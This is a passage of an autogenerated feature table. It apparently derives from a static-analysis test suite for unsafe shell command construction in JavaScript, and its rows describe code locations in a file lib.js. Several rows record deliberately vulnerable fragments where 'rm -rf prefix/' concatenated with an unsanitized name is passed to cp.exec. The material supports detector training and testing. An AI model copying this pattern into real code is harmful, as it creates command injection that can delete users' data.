Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:5:264:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:5:264:8 | exec | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:5:264:8 | exec | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:5:264:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:10:264:25 | "rm -rf prefix/" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:10:264:25 | "rm -rf prefix/" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:10:264:25 | "rm -rf prefix/" | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:10:264:25 | "rm -rf prefix/" | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:10:264:25 | "rm -rf prefix/" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:10:264:25 | "rm -rf prefix/" | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:10:264:32 | "rm -rf ... + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:10:264:32 | "rm -rf ... + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:10:264:32 | "rm -rf ... + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:10:264:32 | "rm -rf ... + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:10:264:32 | "rm -rf ... + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:10:264:32 | "rm -rf ... + name | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:10:264:32 | "rm -rf ... + name | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:10:264:32 | "rm -rf ... + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:10:264:32 | "rm -rf ... + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:29:264:32 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:29:264:32 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:29:264:32 | name | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:29:264:32 | name | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:29:264:32 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:29:264:32 | name | stringConcatenatedWith | 'rm -rf prefix/' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:1:267:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:1:267:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:1:267:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:1:267:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:1:267:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:1:267:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:1:267:32 | module. ... roperty | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:1:267:32 | module. ... roperty | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:1:267:32 | module. ... roperty | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:1:273:1 | module. ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:1:273:1 | module. ... // OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:1:273:1 | module. ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:8:267:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:8:267:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:8:267:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:16:267:32 | sanitizerProperty | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:16:267:32 | sanitizerProperty | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:16:267:32 | sanitizerProperty | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:267:35 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:267:35 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:267:35 | cp | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:267:35 | cp | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:267:35 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:267:35 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:267:35 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:267:35 | this | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:267:35 | this | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:267:35 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | 'arguments' object of anonymous function | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | 'arguments' object of anonymous function | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | exceptional return of anonymous function | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | exceptional return of anonymous function | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | functio ... // OK\\n} | assignedToPropName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | functio ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | functio ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | return of 